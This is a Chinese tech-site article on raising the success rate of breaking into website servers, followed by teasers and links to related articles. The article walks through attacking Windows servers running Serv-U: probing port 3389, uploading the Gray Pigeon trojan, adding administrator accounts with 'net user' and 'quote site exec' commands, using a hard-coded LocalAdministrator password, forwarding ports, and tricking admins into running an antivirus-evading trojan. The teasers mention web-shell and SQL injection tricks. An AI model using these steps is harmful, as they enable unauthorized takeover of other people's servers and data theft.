教你如何提高入侵网站服务器的成功率?
提高入侵网站服务器的成功率,从事网络安全的朋友可以参考下,如果防范。
一:首先检测一下网站的服务器是否开了 3389
远程终端
二:检测一下服务是否用了serv-u (还有是什么版本的)
方法
一:复制一个网站 用 3389 登陆器连接一下 (是否成功)
能连接了,拿下服务器的机率,提高 30%了
二:用ftp模式查下一个服务器的版本
开始 -- 运行 -- cmd -- ftp (加你要登陆的网站)
第一步:最简单的方法
看有没有权限,能不能执行命令,行的话直接传个鸽子运行(成功率非常低)
第二步::寻找有执行的权限目录
c:\winnt\system32\inetsrv\data\
c:\Documents and Settings\All Users\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
这样的目录可以直接上传鸽子,运行
第三步:传个cmd和开帐号的ftp.exe上去直接加帐号
命令就是你上传目录D:\VMware Workstation\cmd.exe "net user xiao xiao
/add"
第四步:asp提权木马直接提权
serv-u 6.3 版本 好象用asp提权木马(不成功)
serv-u 6.2 版本 好象可以
不过提权能不能用asp木马还要看服务器,设置的变态不
假设直接用asp提权成功之后,还是不成功,但是可以在
cmd之下 用这个帐号连接一下
ftp (加你提权的网站)
帐号:LocalAdministrator 密码:$ak#.1k;0@p">#1@$ak#.1k;0@p
如果成功连接后就可以直接添加管理员帐号了
命令:quote site exec (你添加的帐号) net user 123 123 /ad
quote site exec (把帐号提升到最高权限) net localgroup administartors
123 /add
第五步:pcaanywhere
C:\Documents and Settings\All Users\Application
Data\Symantec\pcAnywhere\
这里下他的GIF文件,在本地安装pcanywhere上去
网上很多教程
第六步:serv-u覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini
网上很多教程
第七步:Serv-U转发端口
给Latte加盐 曾经做个一个(serv-u经典提权全套教程)用到过这个方法,可以学习一下
上传个端口转发工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,
IP填对方IP,帐号为LocalAdministrator
密码为$ak#.1k;0@p">#1@$ak#.1k;0@p,
连接上后你就可以管理他的Serv-u了
第八步:社会工程学之提升提权
把灰鸽子传到上面,然后转移到c盘,就等着管理员运行了,前提你的鸽子必须免杀
要是让我看到一个不清楚的exe程序,老想点开看看,呵呵(估计没有那个SB会点吧)
哪些电脑容易被黑客入侵3389端口?防范黑客入侵3389端口的办法
你的ADSL用户名和密码不安全刚刚上网看了会儿新闻,和朋友聊了聊天。之后打游戏的时候,发现比平时要卡,不知道是什么原因,难道是网络问题吗?不管它了。听同事说美剧《英雄》不错,准备今天晚上不关机了,把它
详情2018-01-11 09:03:49责编:llp 来源:驱动管家网页木马有哪些攻击方式?网页木马怎么防御?
常见的网页木马攻击手段有哪些?用户应该如何识别及防御来自网页木马的攻击?笔者将在本文为用户细细道来:
详情2018-01-09 16:05:14责编:llp 来源:驱动管家eweb遇到asp被限制访问拿不了shell
今天看了前面的原创帖子说到eweb遇到asp,asa,cer被限制访问拿不了shell,正好这个问题我是知道的。应该很多大牛都会的吧,估计还是有些不会的,就将就看看吧这是一个eweb入口(废话)用默认帐户密码admin admin进
详情2018-02-08 11:10:13责编:llp 来源:驱动管家phpcms模板在哪个文件夹?phpcms模板sql注射漏洞是怎么样的?
phpcms模板在哪个文件夹?phpcms2008 目录: templates default 常用的模版在phpcms下面phpcms v9 目录: phpcms templates default 常用的模版在content下面phpcms模板sql注射漏洞是怎么样的?漏洞
详情2018-01-15 20:08:19责编:llp 来源:驱动管家手机停机也可以上网?手机免费上网攻略
手机停机一样可以无限量免费上网现在向大家透露一个如何激活已停机卡的方法!?激活了以后就可以免费上网了。注:《本人动感地带的卡已测,通过》!首先,准备一张已经欠费停机的卡。注意重点:《1、需要知道卡的
详情2018-01-09 15:11:13责编:llp 来源:驱动管家cmd命令的提示符有哪些?cmd命令简单代码
代码如下: ————————————————————
详情2018-01-14 13:07:28责编:llp 来源:驱动管家怎么破解40位的md5加密?40位的md5加密破解之法
一般网站后台管理员密码都是经过MD5加密的,差不多都是16位和32位的,如果第一次碰到40位的加密,还真反映不过来,其实都是一样的。7a57a5a743894a0e4a801fc343894a0e4a801fc3原文是admin这个实际上还是MD5加密,
详情2018-01-16 15:26:38责编:llp 来源:驱动管家python爬虫问题 python爬虫怎么处理动态网页?
在爬虫开发中,大家可以很轻易地bypass所谓的UA限制,甚至用scrapy框架轻易实现按照深度进行爬行。但是实际上,这些并不够。关于爬虫的基础知识比如数据处理与数据存储多线程之类的。请大家移步FB:该系列文章都
详情2018-01-15 20:08:13责编:llp 来源:驱动管家u盘病毒的分析 u盘病毒的应对策略
分析: U盘对病毒的传播要借助autorun inf文件的帮助,病毒首先把自身复制到u盘,然后创建一个autorun inf,在你双击u盘时,会根据autorun inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun inf文件的创建
详情2018-01-06 14:21:52责编:llp 来源:驱动管家ewebeditor 漏洞 如何利用ewebeditor 漏检测网站?
现在越来越多的入侵是针对第三方的插件或者文件。那么笔者就带领大家走进ewebeditor在线文本编辑器的世界。了解该如何利用ewebeditor在线文本编辑器的疏漏来获取网站的权限。说起安全检测的方法大家可能最熟悉的
详情2018-01-18 17:06:04责编:llp 来源:驱动管家
- win7系统电脑怎么添加打印机 不需驱动源程序就能安装打印机
- 如何压缩照片?压缩照片的具体方法介绍
- ppt幻灯片图片为什么还没播完就结束放映了?怎么解决
- 电脑主板纽扣电池可以换吗?更换主板电池的方法
- 手机电池不耐用怎么办?教你一招延长电池使用寿命
- B站的流量日租宝都将永久升级为1元800MB国内流量
- ipv6协议怎么配置?Windows7系统ipv6设置的方法
- win7怎么看电脑配置?利用这个办法最简单
- 手把手教你中兴n880刷机知识,让中兴n880更流畅
- 华为畅享5s可以用电信4g网络吗?是不是全网通手机?
- 打开电脑后连接宽带速度很慢是什么原因?如何解决
- softupnotify.exe是什么进程?softupnotify.exe是不是病毒
- 如何降低ie mime sniffing功能带来的风险?
- 网络安全小知识 xss与xssi有什么区别?
- 安装windows server系统提示“无法在此驱动器上安装windows”的解决办法
- 7zCracker压缩文件密码破解工具你肯定不知道这样使用
- 用快压软件怎么给压缩文件加密
- 笔记本外接摄像头的具体参数是什么?笔记本外接摄像头介绍
- 网络摄像头安装不会安装怎么办?网络摄像头安装安装方法
- MWC2018 华硕推出了Zenfone 5系列手机